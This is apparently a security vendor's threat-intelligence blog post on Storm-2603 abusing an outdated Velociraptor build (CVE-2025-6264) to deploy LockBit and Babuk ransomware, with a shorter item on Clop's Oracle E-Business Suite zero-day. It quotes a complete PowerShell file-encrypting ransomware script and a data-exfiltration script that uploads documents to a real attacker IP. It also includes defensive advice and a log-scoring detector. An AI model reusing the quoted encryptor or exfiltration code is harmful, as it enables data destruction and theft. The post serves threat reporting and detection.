CVE-2025-6264 (CVSS N/A) Velociraptor Misuse in Ransomware Attacks


Key takeaways:

  • Ransomware operators are exploiting legitimate DFIR tools like Velociraptor.
  • Attackers used an outdated, vulnerable version of Velociraptor to deploy LockBit and Babuk ransomware.
  • The activity is attributed to the group Storm-2603, a suspected China-based threat actor.
  • Clop ransomware group is actively targeting Oracle E-Business Suite customers, exploiting a zero-day vulnerability.
  • PurpleOps offers services to help organizations defend against sophisticated cyber threats.


Recent findings indicate a concerning trend: ransomware operators are increasingly exploiting legitimate digital forensics and incident response (DFIR) tools like Velociraptor to enhance their attacks. This blog post examines this development, focusing on a specific instance where Velociraptor, combined with other tools and techniques, facilitated a complex ransomware campaign. We will discuss the implications of this trend and provide actionable insights for bolstering your organization’s defenses, including how PurpleOps can assist in mitigating these types of threats.

Velociraptor Leveraged in Ransomware Attacks: A Detailed Look

Cisco Talos recently reported on a ransomware attack in August 2025 where threat actors leveraged Velociraptor, an open-source DFIR tool, to maintain persistent and stealthy access while deploying LockBit and Babuk ransomware. Velociraptor is a powerful tool designed to enable security teams to monitor endpoints by deploying client agents across Windows, Linux, and Mac systems, continuously collecting data and responding to security events. In this instance, however, the tool was turned against the victim.

The attackers installed an outdated version of Velociraptor (version 0.73.4.0), which was vulnerable to CVE-2025-6264, a privilege escalation vulnerability that allowed arbitrary command execution and complete endpoint takeover. This is not the first time Velociraptor has been reportedly misused. There are earlier reports of Velociraptor being used to download and execute Visual Studio Code, likely to create a tunnel to an attacker-controlled command-and-control (C2) server.

This trend aligns with findings from Talos’ 2024 Year in Review, which states that threat actors are leveraging a wider variety of commercial and open-source tools.

Attribution to Storm-2603

Talos assesses with moderate confidence that this activity can be attributed to the group Storm-2603, based on overlapping tools and TTPs. Storm-2603 is a suspected China-based threat actor first identified in July 2025, when they began exploiting the on-premises SharePoint vulnerabilities known as ToolShell.

Storm-2603 is known for deploying Warlock ransomware and LockBit ransomware in the same engagement. While LockBit is widely deployed by a variety of ransomware actors, Warlock was first advertised in June 2025 and has since been heavily used by Storm-2603. The use of two different ransomware variants in the same attack also supports the connection to Storm-2603.

The threat actor in this engagement also mirrored several Storm-2603 TTPs:

  • Use of cmd.exe and batch scripts
  • Disabling Microsoft Defender protections
  • Creating scheduled tasks
  • Manipulating Internet Information Services (IIS) components to load suspicious .NET assemblies
  • Modifying Group Policy Objects (GPOs)

The actors likely gained initial access through ToolShell exploitation, though this could not be confirmed due to limited access to the victim organization’s data.

Campaign Overview

Suspicious activity began in mid-August 2025, with attempts to escalate privileges and move laterally. The threat actor created admin accounts that synced to Entra ID (formerly Azure Active Directory) via the domain controller and accessed the VMware vSphere console, an interface used to manage and interact with virtual machines (VMs).

The threat actor installed an older, vulnerable version of Velociraptor on multiple servers to maintain persistence. They also executed Smbexec, a Python script that allows remote program execution using the SMB protocol.

To impair defenses, the actors modified Active Directory (AD) GPOs to:

  • Disable real-time protection
  • Disable behavior monitoring
  • Disable monitoring of file and program activity

A fileless PowerShell script with encryption functionality was deployed; it is believed to be the primary encryptor for Windows machines.

function GER($n) {-join (1..$n|%{"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-=+[]{}|;:',.<>?`~"[(Get-Random -Maximum 74)]})}function err($pl,$sf){$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;$rsa.FromXmlString($sf);$PB=[Text.Encoding]::UTF8.GetBytes($pl);$rsa.Encrypt($PB,$false)} function gg($path) {$ke = GER(32);$ig =GER(16);$sf = 'tdIXltqjmTpXRB43p+k6X9+JqBZvsD7+X4GsM0AVh0QS6Oev5RVAaQqc6m2pEKN7AYARcpz9iNy5JOB/T+OtWmqxd42bLH+iAUjc1kc1qk1Cg38t7obrGja8L7UMoJkb97ry0ngak9BlqaS7P+wzApOLVJoBNxaJ2rCoj7+Crh3p3Vm2/7/o4pMjgg4S838jw6aiRbag/v4SR86oupqjBvKxsAcZo5A4NDFoZ29j/IMa6GNpMkVjsNPjvB/GIqGcbTqJkb8HGSXw3KvHqwqfsB+01VTsbO7B8kIkOr4jB/M+bHFwgYkUG4rS2s/yJcOOkzH0tJwEj11tLv2bHSzoQQ==AQAB'; $eec=err -pl $ke+$ig -sf $sf;$eee=[System.Convert]::ToBase64String($eec);$key=[System.Text.Encoding]::UTF8.GetBytes($ke);$iv=[System.Text.Encoding]::UTF8.GetBytes($ig);try{$files=gci $path -Recurse -Include .pdf,.txt, *.doc, *.docx, *.odt, *.rtf, *.md, *.csv, *.tsv, *.jpg, *.jpeg, *.tiff, *.mp3, *.xls, *.xlsx, *.ods, *.ppt, *.pptx, *.odp, *.py, *.java, *.cpp, *.c, *.html, *.css, *.js, *.php, *.swift, *.kotlin, *.go, *.rb, *.sh, *.sql, *.db, *.sqlite, *.sqlite3, *.mdb, *.sql, *.zip, *.rar, *.7z, *.tar, *.gz, *.bz2, *.iso, *.torrent, *.ini, *.json, *.xml, *.log, *.bak, *.cfg, *.psd, *.vmdk | select -Expand FullName; foreach ($file in $files) { try {EFI $file $key $iv $eee} catch{}}} catch {Write-Host $ }} function EFI($ifi,$key,$iv,$aT) {if($ifi.EndsWith(".xlockxlock", [System.StringComparison]::OrdinalIgnoreCase)) {return};$aes = [System.Security.Cryptography.Aes]::Create();$aes.KeySize = 256;$aes.Key=$key;$aes.IV=$iv;try{$yy=New-Object System.IO.FileStream($ifi, [System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::None); $xx=$aes.CreateEncryptor($aes.Key, $aes.IV); $mm = New-Object System.Security.Cryptography.CryptoStream($yy, $xx, [System.Security.Cryptography.CryptoStreamMode]::Write); $yy.Seek(0, 
[System.IO.SeekOrigin]::Begin) | Out-Null; $jj = New-Object byte[] ($yy.Length); $yy.Read($jj, 0, $jj.Length) | Out-Null; $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $mm.Write($jj, 0, $jj.Length); $mm.FlushFinalBlock(); $se = 1 } catch { Write-Error $_ } finally {if ($mm) { $mm.Dispose() } if ($yy) { $yy.Dispose() } }try {$kk = [System.Text.Encoding]::UTF8.GetBytes($aT);$bb = New-Object System.IO.FileStream($ifi,[System.IO.FileMode]::Append,[System.IO.FileAccess]::Write,[System.IO.FileShare]::None);if ($se){$bb.Write($kk, 0, $kk.Length)}} catch {Write-Error $_} finally {if ($bb) { $bb.Dispose();if ($se){ren $ifi -NewName $ifi".xlockxlock";}}}};$vg =gdr -PS FileSystem | select -Expand Root;foreach ($II in $vg) {gg -path "$II"}

Following the script deployment, ransomware executables identified as LockBit were observed on Windows machines, encrypting files with the Warlock extension “xlockxlock”. A Linux binary on ESXi servers, flagged as the Babuk encryptor, achieved partial encryption and appended files with “.babyk”. The use of Babuk ransomware has not been previously observed with Storm-2603.

The actors also exfiltrated data using a PowerShell script that suppressed visual indications of progress and included “start-sleep” cmdlets to inhibit analysis and evade detection.

function GR {$numbers = 1..20;$numbers | Get-Random }
function Upfile {
    param (
        [string]$path = "C:\Users\",
        [int]$maxConcurrentJobs = 40  #
    )
    Add-Type -AssemblyName System.Web
    try {
        $files = Get-ChildItem -Path $path -Recurse -Include *.doc,*.docx,*.xlsx,*.ppt,*.pptx,*.xls -ErrorAction SilentlyContinue |
                Where-Object { $_.Length -lt 50MB } |
                Select-Object -ExpandProperty FullName
        $uploadScriptBlock = {
            param ($file, $grValue)
            try {
                Add-Type -AssemblyName System.Web
                $fileName = Split-Path -Path $file -Leaf
                $encodedFileName = [System.Web.HttpUtility]::UrlEncode($fileName)
                $uploadUrl = "http[:]//65.38.121[.]226/test/$encodedFileName"
                Write-Host "upload $file to $uploadUrl"
                $ProgressPreference = 'SilentlyContinue'
                $maxRetries = 3;$retryCount = 0
while ($retryCount -lt $maxRetries) {
            try {
$wc = New-Object System.Net.WebClient;$wc.UploadFile($uploadUrl, "PUT", $file) | Out-Null
                Write-Host "upload Sucess $fileName"
                break
}
catch {
                $retryCount++
                Write-Host "upload $fileName retry $retryCount error: $_"
                Start-Sleep -Seconds 2
                }
                finally {$wc.Dispose()}}}
       catch
            {
                Write-Host "upload $fileName error: $_"
            }
            finally {$wc.Dispose()}

        }
        $grValue = GR
        $jobs = @()
        foreach ($file in $files) {
            while ((Get-Job -State Running).Count -ge $maxConcurrentJobs) {Start-Sleep -Milliseconds 100}
            $jobs += Start-Job -ScriptBlock $uploadScriptBlock -ArgumentList $file, $grValue
        }
        $jobs | Wait-Job | ForEach-Object {
            Receive-Job -Job $_ -Keep
            Remove-Job -Job $_
        }
    } catch {
        Write-Host "getfile error: $_"
    }
}
$drives = @("C:\Users\", "D:\", "E:\", "F:\", "K:\")
foreach ($drive in $drives) {
    if (Test-Path $drive) {Upfile -Path $drive   }
    else {Write-Host "Drive $drive is not accessible." -ForegroundColor Yellow}
}

Clop Attacks Oracle E-Business Suite via Zero-Day Exploit

In related news, the Clop ransomware group has been actively targeting Oracle E-Business Suite customers, exploiting a zero-day vulnerability to steal significant amounts of data. Google Threat Intelligence Group (GTIG) and Mandiant reported that this activity began as early as August 9, 2025, with extortion emails sent to victim organizations on September 29, 2025. The critical zero-day vulnerability, CVE-2025-61882, was disclosed by Oracle on Saturday, two days after the extortion emails were reported.

The widespread attack spree actually involved at least five distinct defects, including the zero-day, that were chained together to achieve pre-authenticated remote code execution, watchTowr researchers said earlier this week.

Shadowserver scans found 576 potentially vulnerable instances of Oracle E-Business Suite on Oct. 6, with the majority of those IPs based in the United States. Clop’s ransom demands have reached up to $50 million.

Investigations into Clop’s activity underscore the stealthy nature of the threat group’s operations, including the use of multi-stage fileless malware designed to evade file-based detection. Other critical details remain unknown and cybercriminals from other groups have complicated analysis through unsubstantiated claims.

Mandiant said it observed artifacts on Oct. 3 that overlap with an exploit leaked in a Telegram group dubbed “Scattered LAPSUS$ Hunters.” Yet, Google hasn’t gathered enough evidence to definitively link the malicious July 2025 activity with this exploit.

Practical Takeaways

For Technical Readers:

  • Patch Management: Regularly update all software, including DFIR tools like Velociraptor and enterprise platforms like Oracle E-Business Suite. Pay close attention to security advisories and prioritize patching vulnerabilities promptly.
  • Vulnerability Scanning: Conduct regular vulnerability scans to identify outdated or vulnerable software versions within your environment.
  • Privilege Management: Implement strict privilege management policies to limit the ability of attackers to escalate privileges, disable security controls, and move laterally within the network.
  • Endpoint Detection and Response (EDR): Deploy and configure EDR solutions to detect and block malicious activity on endpoints, including the execution of unauthorized tools and scripts.
  • Monitor for Suspicious Activity: Implement monitoring and alerting for unusual activity, such as the execution of cmd.exe, PowerShell scripts, and modifications to Active Directory GPOs. Consider leveraging a cyber threat intelligence platform to identify emerging threats and tactics.
  • Network Segmentation: Segment your network to limit the impact of a potential breach and prevent attackers from moving laterally to other critical systems.
  • Review Tool Usage: Ensure that security tools are configured correctly and are actively monitored. Implement controls to prevent misuse of legitimate tools by unauthorized users.
  • Dark Web Monitoring: Implement a dark web monitoring service to identify leaked credentials or early warnings of attacks targeting your infrastructure.
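As an added illustration of the monitoring takeaway above (example code written for this post, not from Talos, Velociraptor or PurpleOps), the following Python scorer runs over constructed PowerShell script block logging (Event ID 4104) records and flags blocks that combine several of the traits described earlier for the fileless encryptor and the exfiltration script. The indicator regexes, weights, threshold, host names and the 203.0.113.5 address are all assumptions made for the example.

```python
import re

# Weighted indicators drawn from the behaviours described above: the fileless
# AES/RSA encryptor (.xlockxlock rename, drive enumeration) and the exfil script
# (silent PUT uploads to a bare IP, sleeps, parallel jobs). Regexes are constructed.
INDICATORS = [
    ("rsa_xml_key_import", r"RSACryptoServiceProvider|FromXmlString", 2),
    ("aes_create", r"\[System\.Security\.Cryptography\.Aes\]::Create", 2),
    ("rename_warlock_ext", r"\.xlockxlock", 4),
    ("enumerate_all_drives", r"(gdr|Get-PSDrive)\s+-PS\w*\s+FileSystem", 2),
    ("recursive_doc_sweep", r"(gci|Get-ChildItem).*-Recurse.*-Include", 1),
    ("progress_suppressed", r"\$ProgressPreference\s*=\s*'SilentlyContinue'", 1),
    ("upload_put_to_ip", r'UploadFile\([^)]*"PUT"|https?://\d{1,3}(\.\d{1,3}){3}', 3),
    ("sleep_between_retries", r"Start-Sleep", 1),
    ("parallel_jobs", r"Start-Job\s+-ScriptBlock", 1),
]
ALERT_THRESHOLD = 4  # a single weak indicator alone never alerts

# Constructed Event ID 4104 (script block logging) records, not real logs.
# 203.0.113.5 is a TEST-NET placeholder standing in for an attacker host.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Host": "SRV01", "ScriptBlockText":
     "Get-ChildItem C:\\Logs -Recurse -Include *.log | Where-Object Length -gt 1MB"},
    {"EventID": 4104, "Host": "SRV02", "ScriptBlockText":
     "$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;"
     "$rsa.FromXmlString($sf);$aes=[System.Security.Cryptography.Aes]::Create();"
     "ren $f -NewName $f'.xlockxlock';$vg=gdr -PS FileSystem | select -Expand Root"},
    {"EventID": 4104, "Host": "WS07", "ScriptBlockText":
     "$ProgressPreference='SilentlyContinue';$wc=New-Object System.Net.WebClient;"
     "$wc.UploadFile('http://203.0.113.5/test/a.docx', \"PUT\", $f);Start-Sleep -Seconds 2"},
]

def score_script_block(text):
    """Return (score, matched indicator names) for one script block."""
    hits = [n for n, pat, _ in INDICATORS if re.search(pat, text, re.IGNORECASE)]
    return sum(w for n, _, w in INDICATORS if n in hits), hits

def triage(events):
    """Score every 4104 event; return (host, score, hits) alerts, highest score first."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        score, hits = score_script_block(ev["ScriptBlockText"])
        if score >= ALERT_THRESHOLD:
            alerts.append((ev["Host"], score, hits))
    return sorted(alerts, key=lambda a: a[1], reverse=True)

if __name__ == "__main__":
    for host, score, hits in triage(SAMPLE_EVENTS):
        print(f"{host}: score={score} indicators={', '.join(hits)}")
```

The benign recursive listing on SRV01 scores 1 and stays silent, while the encryptor-like and exfil-like blocks exceed the threshold; tune weights against your own baseline before alerting in production.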

For Business Leaders:

  • Risk Assessment: Conduct a comprehensive risk assessment to identify potential vulnerabilities and weaknesses in your organization’s cybersecurity posture.
  • Cybersecurity Budget: Allocate sufficient resources to cybersecurity, including investments in security tools, training, and personnel.
  • Incident Response Plan: Develop and regularly test an incident response plan to ensure that your organization is prepared to respond to a ransomware attack or other security incident.
  • Employee Training: Provide cybersecurity awareness training to employees to educate them about the risks of phishing, social engineering, and other common attack vectors.
  • Supply Chain Risk Monitoring: Understand the cybersecurity posture of your vendors and suppliers, and ensure that they have adequate security controls in place.
  • Real-time ransomware intelligence integration into your security operations can significantly improve your ability to detect and respond to ransomware attacks.
  • Breach detection capabilities should be continuously tested and improved to identify and contain breaches as quickly as possible.

How PurpleOps Can Help

PurpleOps offers a suite of services designed to help organizations defend against sophisticated cyber threats, including ransomware attacks that leverage legitimate tools. Our expertise includes:

  • Cyber Threat Intelligence Platform: Leverage our platform for real-time insights into emerging threats, attacker tactics, and vulnerabilities. This includes comprehensive brand leak alerting and underground forum intelligence to proactively identify and mitigate risks.
  • Dark Web Monitoring: Our dark web monitoring service can identify compromised credentials and other sensitive information that could be used to launch an attack against your organization.
  • Supply Chain Information Security: We can assess the security posture of your vendors and suppliers to identify and mitigate supply chain risks.
  • Red Team Operations: Our red team operations simulate real-world attacks to identify weaknesses in your defenses and provide recommendations for improvement.
  • Penetration Testing: We conduct thorough penetration testing to identify vulnerabilities in your systems and applications before attackers can exploit them.

The increasing use of legitimate tools in ransomware attacks underscores the need for a proactive and comprehensive approach to cybersecurity. By implementing the practical takeaways outlined in this blog post and leveraging the expertise of PurpleOps, organizations can significantly reduce their risk of becoming a victim of these types of attacks.

Protect your organization from ransomware threats. Explore our range of services at PurpleOps Solutions or contact us at https://www.purple-ops.io/platform/ for a consultation.

FAQ

Q: What is Velociraptor?
A: Velociraptor is an open-source digital forensics and incident response (DFIR) tool.

Q: What is CVE-2025-6264?
A: CVE-2025-6264 is a privilege escalation vulnerability found in older versions of Velociraptor.

Q: Who is Storm-2603?
A: Storm-2603 is a suspected China-based threat actor known for deploying Warlock and LockBit ransomware.